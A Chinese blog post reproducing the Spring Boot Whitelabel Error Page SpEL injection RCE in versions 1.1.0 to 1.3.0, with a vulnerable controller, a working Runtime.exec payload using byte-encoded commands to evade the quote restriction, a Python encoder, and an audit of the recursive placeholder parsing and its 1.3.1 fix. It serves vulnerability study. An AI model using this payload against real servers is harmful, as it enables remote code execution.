当前位置: 开发笔记 > 编程语言 > 正文

『JavaWeb漏洞复现』低版本Springboot报错页面SPEL注入

作者：喵屎柔_ | 来源：互联网 | 2023-06-12 17:50

文章目录漏洞简介影响范围漏洞复现RCE注意事项代码审计POP链漏洞修复参考完漏洞简介向一个可以能引发报错的controller传参，报错时会渲染出报错页面对输入的参

文章目录

漏洞简介
影响范围
漏洞复现
- RCE注意事项
代码审计
POP链
漏洞修复
参考
完

漏洞简介

向一个可以能引发报错的controller传参&＃xff0c;报错时会渲染出报错页面对输入的参数SPEL解析

影响范围

Springboot: 1.1.0 ~ 1.1.12、1.2.0 ~ 1.2.7、1.3.0

漏洞复现

新建Springboot项目&＃xff0c;设置为受影响的版本

在这里插入图片描述

编写一个通过输入能抛出错误的controller

package com.example.springbooterrorpagerce;import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; import org.springframework.web.bind.annotation.RestController;&＃64;RestController public class Controller {&＃64;ResponseBody&＃64;RequestMapping("/")public void inject(String spel){Integer.parseInt(spel);} }

传入SPEL表达式触发注入

在这里插入图片描述

RCE注意事项

这里SPEL表达式是不能含有单双引号的&＃xff0c;否则无法RCE&＃xff0c;因此在exec的时候需要绕过&＃xff1a;将引号字符串换成ascii表示

${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}

ascii转换&＃xff1a;

# coding: utf-8result &＃61; "" target &＃61; &＃39;open -a Calculator&＃39; for x in target:result &＃43;&＃61; hex(ord(x)) &＃43; "," print(result.rstrip(&＃39;,&＃39;))
代码审计

从报错页面渲染开始&＃xff0c;在org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration

在这里插入图片描述

this.template是报错页面的模板&＃xff0c;渲染该页面是通过SPEL表达式解析来达到参数替换

<html><body><h1>Whitelabel Error Pageh1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.p><div id&＃61;&＃39;created&＃39;>${timestamp}div><div>There was an unexpected error (type&＃61;${error}, status&＃61;${status}).div><div>${message}div>body> html>

this.replacePlaceholders方法传入模板和占位符解析器来渲染页面&＃xff0c;来到PropertyPlaceHolderHelper#parseStringValue方法

首先会对模板的所有被${}包裹的占位符进行一层${}去除&＃xff0c;然后再递归去除多重包裹

在这里插入图片描述

获取占位符

在这里插入图片描述

获取到占位符就去解析对应的值

在这里插入图片描述

第一个被解析的是timestamp&＃xff0c;这里用的是SPEL的解析器

在这里插入图片描述

占位符解析成功后&＃xff0c;接着又会对解析出来的值再一次进行递归去除${}&＃43;SPEL解析

在这里插入图片描述

同理&＃xff0c;当解析最后一个占位符message时&＃xff0c;先从模板递归&＃43;SPEL解析出占位符message的值&＃xff0c;然后又对message的值递归&＃43;SPEL解析

在这里插入图片描述

就在此时解析了可控输入产生漏洞

在这里插入图片描述

POP链

在这里插入图片描述

漏洞修复

漏洞产生是由于先从模板递归&＃43;SPEL解析出占位符message的值&＃xff0c;然后又对message的值递归&＃43;SPEL解析&＃xff0c;两次操作使用的是同一个方法&＃xff0c;而本质上只需要在从模板中解析占位符时候调用SPEL&＃xff0c;无需对值进行解析

因此官方在1.3.1版本更新了一个无递归解析的NonRecursivePropertyPlaceholderHelper

在这里插入图片描述

调用它的parseStringValue方法&＃xff0c;然后再调用resolvePlaceholder方法时就会直接返回null而不会递归&＃43;SPEL解析

在这里插入图片描述

那么我们在resolvePlaceholder()处打断点&＃xff1a;

在从模板解析${message}时&＃xff1a;this.resolver不是NonRecursivePropertyPlaceholderHelper因此调用SPEL解析&＃xff0c;解析结果是我们的传参字符串${7*8}

在这里插入图片描述

解析字符串${7*8}时发现是NonRecursivePropertyPlaceholderHelper因此返回null

在这里插入图片描述

返回null就不会进行递归解析了

在这里插入图片描述

更新后把模板占位符和具体替换值分开操作而不公用同一个方法&＃xff0c;仅对占位符进行解析而不解析具体值&＃xff0c;从而避免了非法注入

参考

https://www.cnblogs.com/litlife/p/10183137.html
https://github.com/LandGrey/SpringBootVulExploit#0x01whitelabel-error-page-spel-rce

完

欢迎关注我的CSDN博客 &＃xff1a;&＃64;Ho1aAs
版权属于&＃xff1a;Ho1aAs
本文链接&＃xff1a;https://blog.csdn.net/Xxy605/article/details/125223288
版权声明&＃xff1a;本文为原创&＃xff0c;转载时须注明出处及本声明

推荐阅读

main
go利用(*interface{})(nil)传递参数类型的原理及应用

本文介绍了在go语言中利用(*interface{})(nil)传递参数类型的原理及应用。通过分析Martini框架中的injector类型的声明，解释了values映射表的作用以及parent Injector的含义。同时，讨论了该技术在实际开发中的应用场景。 ... [详细]

蜡笔小新 2023-12-10 11:37:12
main
Java太阳系小游戏分析和源码详解

本文介绍了一个基于Java的太阳系小游戏的分析和源码详解。通过对面向对象的知识的学习和实践，作者实现了太阳系各行星绕太阳转的效果。文章详细介绍了游戏的设计思路和源码结构，包括工具类、常量、图片加载、面板等。通过这个小游戏的制作，读者可以巩固和应用所学的知识，如类的继承、方法的重载与重写、多态和封装等。 ... [详细]

蜡笔小新 2023-12-14 19:53:34
main
Golang如何使用Cookie跟踪位置

关键词：Golang, Cookie, 跟踪位置, net/http/cookiejar, package main, golang.org/x/net/publicsuffix, io/ioutil, log, net/http, net/http/cookiejar ... [详细]

蜡笔小新 2023-12-13 15:47:22
int
Python瓦片图下载、合并、绘图、标记的代码示例

本文提供了Python瓦片图下载、合并、绘图、标记的代码示例，包括下载代码、多线程下载、图像处理等功能。通过参考geoserver，使用PIL、cv2、numpy、gdal、osr等库实现了瓦片图的下载、合并、绘图和标记功能。代码示例详细介绍了各个功能的实现方法，供读者参考使用。 ... [详细]

蜡笔小新 2023-12-13 12:14:55
main
[大整数乘法] java代码实现

本文介绍了使用java代码实现大整数乘法的过程，同时也涉及到大整数加法和大整数减法的计算方法。通过分治算法来提高计算效率，并对算法的时间复杂度进行了研究。详细代码实现请参考文章链接。 ... [详细]

蜡笔小新 2023-12-13 11:21:32
int
Android 7自学笔记总结、移动架构视频、安卓面试真题、项目实战源码讲义

本文介绍了Android 7的学习笔记总结，包括最新的移动架构视频、大厂安卓面试真题和项目实战源码讲义。同时还分享了开源的完整内容，并提醒读者在使用FileProvider适配时要注意不同模块的AndroidManfiest.xml中配置的xml文件名必须不同，否则会出现问题。 ... [详细]

蜡笔小新 2023-12-13 10:06:58
int
Android源码深入理解JNI技术的概述和应用

本文介绍了Android源码中的JNI技术，包括概述和应用。JNI是Java Native Interface的缩写，是一种技术，可以实现Java程序调用Native语言写的函数，以及Native程序调用Java层的函数。在Android平台上，JNI充当了连接Java世界和Native世界的桥梁。本文通过分析Android源码中的相关文件和位置，深入探讨了JNI技术在Android开发中的重要性和应用场景。 ... [详细]

蜡笔小新 2023-12-13 10:00:57
main
Go Cobra命令行工具入门教程

本文介绍了Go语言实现的命令行工具Cobra的基本概念、安装方法和入门实践。Cobra被广泛应用于各种项目中，如Kubernetes、Hugo和Github CLI等。通过使用Cobra，我们可以快速创建命令行工具，适用于写测试脚本和各种服务的Admin CLI。文章还通过一个简单的demo演示了Cobra的使用方法。 ... [详细]

蜡笔小新 2023-12-12 20:02:41
main
r2dbc配置多数据源

R2dbc配置多数据源问题根据官网配置r2dbc连接mysql多数据源所遇到的问题pom配置可以参考官网,不过我这样配置会报错我并没有这样配置将以下内容添加到pom.xml文件d ... [详细]

蜡笔小新 2023-12-12 16:38:53
main
Spring学习（4）：Spring管理对象之间的关联关系

本文是关于Spring学习的第四篇文章，讲述了Spring框架中管理对象之间的关联关系。文章介绍了MessageService类和MessagePrinter类的实现，并解释了它们之间的关联关系。通过学习本文，读者可以了解Spring框架中对象之间的关联关系的概念和实现方式。 ... [详细]

蜡笔小新 2023-12-12 13:44:30
int
SpringMVC接收请求参数的方式总结

本文总结了在SpringMVC开发中处理控制器参数的各种方式，包括处理使用@RequestParam注解的参数、MultipartFile类型参数和Simple类型参数的RequestParamMethodArgumentResolver，处理@RequestBody注解的参数的RequestResponseBodyMethodProcessor，以及PathVariableMapMethodArgumentResol等子类。 ... [详细]

蜡笔小新 2023-12-11 19:55:40
main
（三）多表代码生成的实现方法

本文介绍了一种实现多表代码生成的方法，使用了java代码和org.jeecg框架中的相关类和接口。通过设置主表配置，可以生成父子表的数据模型。 ... [详细]

蜡笔小新 2023-12-11 19:46:13
main
Android系统源码分析Zygote和SystemServer启动过程详解

本文详细解析了Android系统源码中Zygote和SystemServer的启动过程。首先介绍了系统framework层启动的内容，帮助理解四大组件的启动和管理过程。接着介绍了AMS、PMS等系统服务的作用和调用方式。然后详细分析了Zygote的启动过程，解释了Zygote在Android启动过程中的决定作用。最后通过时序图展示了整个过程。 ... [详细]

蜡笔小新 2023-12-11 17:46:46
main
python限制递归次数（python最大公约数递归）

本文目录一览：1、python为什么要进行递归限制 ... [详细]

蜡笔小新 2023-12-11 17:39:02
int
系数应为整数：syy diophantine方程 - Coefficients should be Integers: sympy diophantine equations

Ihaveapolynomial(generatedfromthecharacteristicpolynomialofamatrix)andIdliketosolve ... [详细]

蜡笔小新 2023-12-11 09:20:31

喵屎柔_

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章